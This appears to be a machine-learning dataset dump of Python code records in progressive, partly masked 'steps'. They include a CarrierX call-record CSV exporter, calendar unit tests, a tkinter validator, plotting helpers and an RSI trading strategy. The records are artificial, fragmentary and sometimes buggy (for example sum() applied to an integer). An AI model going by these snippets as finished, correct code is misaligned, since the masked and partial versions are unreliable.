"blob_id": "8262d8b5bbb156eccae021c1c9333d3cd1a6260f",
"index": 9030,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(dr_items):\n with open('calls.csv', 'w', encoding='UTF8') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',\n 'direction', 'duration', 'price']\n csv_writer.writerow(csv_header)\n dr_sid = dr_items[0]['dr_sid']\n csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],\n dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[\n 0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {dr_items[0]['dr_sid']}\")\n while True:\n params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid\n }\n r = requests.get(url, headers=headers, params=params)\n if len(r.json()['items']):\n dr_items = r.json()['items']\n for item in dr_items:\n i += 1\n dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']\n csv_row = [item['dr_sid'], item['date_start'], item[\n 'number_src'], item['number_dst'], item['direction'\n ], item['duration'], item['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {item['dr_sid']}\")\n else:\n print('No more new calls')\n break\nelse:\n print(f'No calls since {date}')\n",
"step-3": "<mask token>\nheaders = {'Authorization': f'Bearer {configuration.CARRIERX_API_TOKEN}'}\nurl = f'{configuration.BASE_CARRIERX_API_URL}/core/v2/calls/call_drs'\ndate = configuration.DATE\ni = 1\nparams = {'limit': '1', 'order': 'date_stop asc', 'filter':\n f'date_stop ge {date}'}\nr = requests.get(url, headers=headers, params=params)\ndr_items = r.json()['items']\nif len(dr_items):\n with open('calls.csv', 'w', encoding='UTF8') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',\n 'direction', 'duration', 'price']\n csv_writer.writerow(csv_header)\n dr_sid = dr_items[0]['dr_sid']\n csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],\n dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[\n 0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {dr_items[0]['dr_sid']}\")\n while True:\n params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid\n }\n r = requests.get(url, headers=headers, params=params)\n if len(r.json()['items']):\n dr_items = r.json()['items']\n for item in dr_items:\n i += 1\n dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']\n csv_row = [item['dr_sid'], item['date_start'], item[\n 'number_src'], item['number_dst'], item['direction'\n ], item['duration'], item['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {item['dr_sid']}\")\n else:\n print('No more new calls')\n break\nelse:\n print(f'No calls since {date}')\n",
"step-4": "import requests, csv, configuration\nheaders = {'Authorization': f'Bearer {configuration.CARRIERX_API_TOKEN}'}\nurl = f'{configuration.BASE_CARRIERX_API_URL}/core/v2/calls/call_drs'\ndate = configuration.DATE\ni = 1\nparams = {'limit': '1', 'order': 'date_stop asc', 'filter':\n f'date_stop ge {date}'}\nr = requests.get(url, headers=headers, params=params)\ndr_items = r.json()['items']\nif len(dr_items):\n with open('calls.csv', 'w', encoding='UTF8') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',\n 'direction', 'duration', 'price']\n csv_writer.writerow(csv_header)\n dr_sid = dr_items[0]['dr_sid']\n csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],\n dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[\n 0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {dr_items[0]['dr_sid']}\")\n while True:\n params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid\n }\n r = requests.get(url, headers=headers, params=params)\n if len(r.json()['items']):\n dr_items = r.json()['items']\n for item in dr_items:\n i += 1\n dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']\n csv_row = [item['dr_sid'], item['date_start'], item[\n 'number_src'], item['number_dst'], item['direction'\n ], item['duration'], item['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {item['dr_sid']}\")\n else:\n print('No more new calls')\n break\nelse:\n print(f'No calls since {date}')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import unittest
from month import Month
class MonthUnitTests(unittest.TestCase):
def test_header(self):
cal = Month(5, 2012)
result = cal.header()
self.assertEqual(" May 2012", result)
def test_header_different_month(self):
cal = Month(3, 2012)
result = cal.header()
self.assertEqual(" March 2012", result)
def test_zeller(self):
cal = Month(3, 1995)
result = cal.zeller()
self.assertEqual(3, result)
def test_zeller_again(self):
cal = Month(6, 2999)
self.assertEqual(6, cal.zeller())
def test_zeller_january(self):
cal = Month(1, 2000)
self.assertEqual(6, cal.zeller())
def test_zeller_february(self):
cal = Month(2, 2000)
self.assertEqual(2, cal.zeller())
def test_number_of_days(self):
cal = Month(6, 1900)
self.assertEqual(30, cal.days_number())
def test_number_of_days_february(self):
cal = Month(2, 1995)
self.assertEqual(28, cal.days_number())
def test_number_of_days_leap_year(self):
cal = Month(2, 1996)
self.assertEqual(29, cal.days_number())
def test_number_of_days_leap_century(self):
cal = Month(2, 2000)
self.assertEqual(29, cal.days_number())
def test_number_of_days_non_leap_century(self):
cal = Month(2, 1900)
self.assertEqual(28, cal.days_number())
def test_blank_spaces(self):
cal = Month(2, 1990)
self.assertEqual([" "," "," "," "], cal.spaces())
def test_days(self):
cal = Month(2, 1990)
expected = [" 1"," 2"," 3"," 4"," 5"," 6"," 7"," 8"," 9","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28"]
self.assertEqual(expected, cal.days())
def test_format_days(self):
cal = Month(2, 1990)
expected = [" "," "," "," "," 1"," 2"," 3"," 4"," 5"," 6"," 7"," 8"," 9","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28"]
self.assertEqual(expected, cal.format_days())
|
normal
|
{
"blob_id": "36c1d75171d772138b820651e11a3a7bc3a6521c",
"index": 8226,
"step-1": "<mask token>\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n <mask token>\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n\n def test_zeller_again(self):\n cal = Month(6, 2999)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n\n def test_zeller_again(self):\n cal = Month(6, 2999)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n\n def test_format_days(self):\n cal = Month(2, 1990)\n expected = [' ', ' ', ' ', ' ', ' 1', ' 2', ' 3', ' 4', ' 5',\n ' 6', ' 7', ' 8', ' 9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '21', '22', '23', '24', '25',\n '26', '27', '28']\n self.assertEqual(expected, cal.format_days())\n",
"step-4": "import unittest\nfrom month import Month\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n\n def test_zeller_again(self):\n cal = Month(6, 2999)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n\n def test_format_days(self):\n cal = Month(2, 1990)\n expected = [' ', ' ', ' ', ' ', ' 1', ' 2', ' 3', ' 4', ' 5',\n ' 6', ' 7', ' 8', ' 9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '21', '22', '23', '24', '25',\n '26', '27', '28']\n self.assertEqual(expected, cal.format_days())\n",
"step-5": "import unittest\nfrom month import Month\n\nclass MonthUnitTests(unittest.TestCase):\n\n\tdef test_header(self):\n\t\tcal = Month(5, 2012)\n\t\tresult = cal.header()\n\t\tself.assertEqual(\" May 2012\", result)\n\n\tdef test_header_different_month(self):\n\t\tcal = Month(3, 2012)\n\t\tresult = cal.header()\n\t\tself.assertEqual(\" March 2012\", result)\n\n\tdef test_zeller(self):\n\t\tcal = Month(3, 1995)\n\t\tresult = cal.zeller()\n\t\tself.assertEqual(3, result)\n\n\tdef test_zeller_again(self):\n\t\tcal = Month(6, 2999)\n\t\tself.assertEqual(6, cal.zeller())\n\n\tdef test_zeller_january(self):\n\t\tcal = Month(1, 2000)\n\t\tself.assertEqual(6, cal.zeller())\n\n\tdef test_zeller_february(self):\n\t\tcal = Month(2, 2000)\n\t\tself.assertEqual(2, cal.zeller())\n\n\tdef test_number_of_days(self):\n\t\tcal = Month(6, 1900)\n\t\tself.assertEqual(30, cal.days_number())\n\n\tdef test_number_of_days_february(self):\n\t\tcal = Month(2, 1995)\n\t\tself.assertEqual(28, cal.days_number())\n\n\tdef test_number_of_days_leap_year(self):\n\t\tcal = Month(2, 1996)\n\t\tself.assertEqual(29, cal.days_number())\n\n\tdef test_number_of_days_leap_century(self):\n\t\tcal = Month(2, 2000)\n\t\tself.assertEqual(29, cal.days_number())\n\n\tdef test_number_of_days_non_leap_century(self):\n\t\tcal = Month(2, 1900)\n\t\tself.assertEqual(28, cal.days_number())\n\n\tdef test_blank_spaces(self):\n\t\tcal = Month(2, 1990)\n\t\tself.assertEqual([\" \",\" \",\" \",\" \"], cal.spaces())\n\n\tdef test_days(self):\n\t\tcal = Month(2, 1990)\n\t\texpected = [\" 1\",\" 2\",\" 3\",\" 4\",\" 5\",\" 6\",\" 7\",\" 8\",\" 9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\"]\n\t\tself.assertEqual(expected, cal.days())\n\n\tdef test_format_days(self):\n\t\tcal = Month(2, 1990)\n\t\texpected = [\" \",\" \",\" \",\" \",\" 1\",\" 2\",\" 3\",\" 4\",\" 5\",\" 6\",\" 7\",\" 8\",\" 9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\"]\n\t\tself.assertEqual(expected, cal.format_days())",
"step-ids": [
13,
14,
15,
16,
17
]
}
|
[
13,
14,
15,
16,
17
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequiredEntry(ValidatedMixin, ttk.Entry):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequiredEntry(ValidatedMixin, ttk.Entry):
def _focusout_validate(self, event):
valid = True
if not self.get():
valid = False
self.error.set('A value is required')
return valid
<|reserved_special_token_1|>
from tkinter import ttk
from chapter04a.validated_mixin import ValidatedMixin
class RequiredEntry(ValidatedMixin, ttk.Entry):
def _focusout_validate(self, event):
valid = True
if not self.get():
valid = False
self.error.set('A value is required')
return valid
|
flexible
|
{
"blob_id": "59047a113d76c64be48858258441fae5da505790",
"index": 5792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass RequiredEntry(ValidatedMixin, ttk.Entry):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass RequiredEntry(ValidatedMixin, ttk.Entry):\n\n def _focusout_validate(self, event):\n valid = True\n if not self.get():\n valid = False\n self.error.set('A value is required')\n return valid\n",
"step-4": "from tkinter import ttk\nfrom chapter04a.validated_mixin import ValidatedMixin\n\n\nclass RequiredEntry(ValidatedMixin, ttk.Entry):\n\n def _focusout_validate(self, event):\n valid = True\n if not self.get():\n valid = False\n self.error.set('A value is required')\n return valid\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def twoSum(self, numbers, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
idx1 = 0
idx2 = len(numbers) - 1
while idx1 < idx2:
left = numbers[idx1]
right = numbers[idx2]
if left + right < target:
idx1 += 1
elif left + right > target:
idx2 -= 1
else:
return [idx1 + 1, idx2 + 1]
<|reserved_special_token_1|>
class Solution(object):
def twoSum(self, numbers, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
idx1 = 0
idx2 = len(numbers)-1
while(idx1<idx2): # can also use a for-loop: for num in numbers:
left = numbers[idx1]
right = numbers[idx2]
if (left + right) < target:
idx1 += 1
elif (left + right) > target:
idx2 -= 1
else:
return [idx1+1,idx2+1]
|
flexible
|
{
"blob_id": "51b3beee8659bccee0fbb64b80fdce18b693674b",
"index": 9481,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def twoSum(self, numbers, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n idx1 = 0\n idx2 = len(numbers) - 1\n while idx1 < idx2:\n left = numbers[idx1]\n right = numbers[idx2]\n if left + right < target:\n idx1 += 1\n elif left + right > target:\n idx2 -= 1\n else:\n return [idx1 + 1, idx2 + 1]\n",
"step-4": "class Solution(object):\n def twoSum(self, numbers, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n idx1 = 0\n idx2 = len(numbers)-1\n while(idx1<idx2): # can also use a for-loop: for num in numbers: \n left = numbers[idx1]\n right = numbers[idx2]\n if (left + right) < target:\n idx1 += 1\n elif (left + right) > target:\n idx2 -= 1\n else:\n return [idx1+1,idx2+1]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python3
################################################################################
# Usefull functions to shorten some of my plotting routine #####################
################################################################################
import matplotlib.pyplot as plt
import seaborn as sns
import uncertainties as uc
def set_sns_standard(context = 'paper', font_scale=1.4, linewidth=1.5, font='serif'):
rc_params = {'lines.linewidth':linewidth, 'text.usetex':True}
sns.set(style='ticks', font=font, palette='Set1', context=context, font_scale=font_scale, rc=rc_params)
def remove_ticks(axe, top=True, right=True):
if right:
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
left='on', # ticks along the bottom edge are off
right='off', # ticks along the top edge are off
labelright='off') # labels along the bottom edge are off
if top:
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='on', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelbottom='on') # labels along the bottom edge are off
def plot_function_w_uc(axe, x, function, par_uc, **kwargs):
"""Plots a function with shaded area for uncertainties.
:axe: subfigure to plot on
:x: x-values to plot on
:function: function to plot, should be a function with full
support for uncertainties
:par_uc: parameters using uncertainties.correlated_values
"""
result_uc = function(x, *par_uc)
result_n = uc.unumpy.nominal_values(result_uc)
result_std = uc.unumpy.std_devs(result_uc)
result_upper = result_n + result_std
result_lower = result_n - result_std
line = axe.plot(x, result_n, **kwargs)
color = line[0].get_color() #????
axe.fill_between(x, result_lower, result_upper, color=color, alpha=.3)
|
normal
|
{
"blob_id": "b935c48210b1965ebb0de78384f279b71fc17d5d",
"index": 7044,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef set_sns_standard(context='paper', font_scale=1.4, linewidth=1.5, font=\n 'serif'):\n rc_params = {'lines.linewidth': linewidth, 'text.usetex': True}\n sns.set(style='ticks', font=font, palette='Set1', context=context,\n font_scale=font_scale, rc=rc_params)\n\n\n<mask token>\n\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color()\n axe.fill_between(x, result_lower, result_upper, color=color, alpha=0.3)\n",
"step-3": "<mask token>\n\n\ndef set_sns_standard(context='paper', font_scale=1.4, linewidth=1.5, font=\n 'serif'):\n rc_params = {'lines.linewidth': linewidth, 'text.usetex': True}\n sns.set(style='ticks', font=font, palette='Set1', context=context,\n font_scale=font_scale, rc=rc_params)\n\n\ndef remove_ticks(axe, top=True, right=True):\n if right:\n plt.tick_params(axis='y', which='both', left='on', right='off',\n labelright='off')\n if top:\n plt.tick_params(axis='x', which='both', bottom='on', top='off',\n labelbottom='on')\n\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color()\n axe.fill_between(x, result_lower, result_upper, color=color, alpha=0.3)\n",
"step-4": "import matplotlib.pyplot as plt\nimport seaborn as sns\nimport uncertainties as uc\n\n\ndef set_sns_standard(context='paper', font_scale=1.4, linewidth=1.5, font=\n 'serif'):\n rc_params = {'lines.linewidth': linewidth, 'text.usetex': True}\n sns.set(style='ticks', font=font, palette='Set1', context=context,\n font_scale=font_scale, rc=rc_params)\n\n\ndef remove_ticks(axe, top=True, right=True):\n if right:\n plt.tick_params(axis='y', which='both', left='on', right='off',\n labelright='off')\n if top:\n plt.tick_params(axis='x', which='both', bottom='on', top='off',\n labelbottom='on')\n\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color()\n axe.fill_between(x, result_lower, result_upper, color=color, alpha=0.3)\n",
"step-5": "#!/usr/bin/python3\n\n\n################################################################################\n# Usefull functions to shorten some of my plotting routine #####################\n################################################################################\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport uncertainties as uc\n\ndef set_sns_standard(context = 'paper', font_scale=1.4, linewidth=1.5, font='serif'):\n rc_params = {'lines.linewidth':linewidth, 'text.usetex':True}\n sns.set(style='ticks', font=font, palette='Set1', context=context, font_scale=font_scale, rc=rc_params)\n\ndef remove_ticks(axe, top=True, right=True):\n if right:\n plt.tick_params(\n axis='y', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n left='on', # ticks along the bottom edge are off\n right='off', # ticks along the top edge are off\n labelright='off') # labels along the bottom edge are off\n if top:\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom='on', # ticks along the bottom edge are off\n top='off', # ticks along the top edge are off\n labelbottom='on') # labels along the bottom edge are off\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color() #????\n \n axe.fill_between(x, result_lower, result_upper, color=color, alpha=.3)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#This is just a test
print("this is something new")
for a in range(10):
print(sum(a))
print("the loop worked")
|
normal
|
{
"blob_id": "df317e914073f5b236f73b616b87f86ae378ef38",
"index": 8755,
"step-1": "<mask token>\n",
"step-2": "print('this is something new')\nfor a in range(10):\n print(sum(a))\nprint('the loop worked')\n",
"step-3": "#This is just a test\nprint(\"this is something new\")\nfor a in range(10):\n print(sum(a))\nprint(\"the loop worked\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def play():
print("playing tank games...")
print("runing tank now!!!")
|
normal
|
{
"blob_id": "8c7fe90972feec19e280d3bccd39391af666608a",
"index": 9410,
"step-1": "<mask token>\n",
"step-2": "def play():\n print('playing tank games...')\n\n\n<mask token>\n",
"step-3": "def play():\n print('playing tank games...')\n\n\nprint('runing tank now!!!')\n",
"step-4": "def play():\n print(\"playing tank games...\")\nprint(\"runing tank now!!!\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
print((9*int(input())/5)+32)
|
normal
|
{
"blob_id": "4e9a968842c2b3eca79690f0b56c8e176b203138",
"index": 362,
"step-1": "<mask token>\n",
"step-2": "print(9 * int(input()) / 5 + 32)\n",
"step-3": "print((9*int(input())/5)+32)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
<|reserved_special_token_0|>
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
<|reserved_special_token_0|>
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and
self.buyAlert):
size = round(self.broker.getcash() / self.data, 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
if self.position.size != 0:
if self.rsi_4 > 67:
self.sellAlert1 = True
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
if self.rsi_4 > 85:
self.sellAlert2 = True
if self.rsi_4 < 80 and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
if 0.82 * self.order.executed.price > self.datas[0
].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
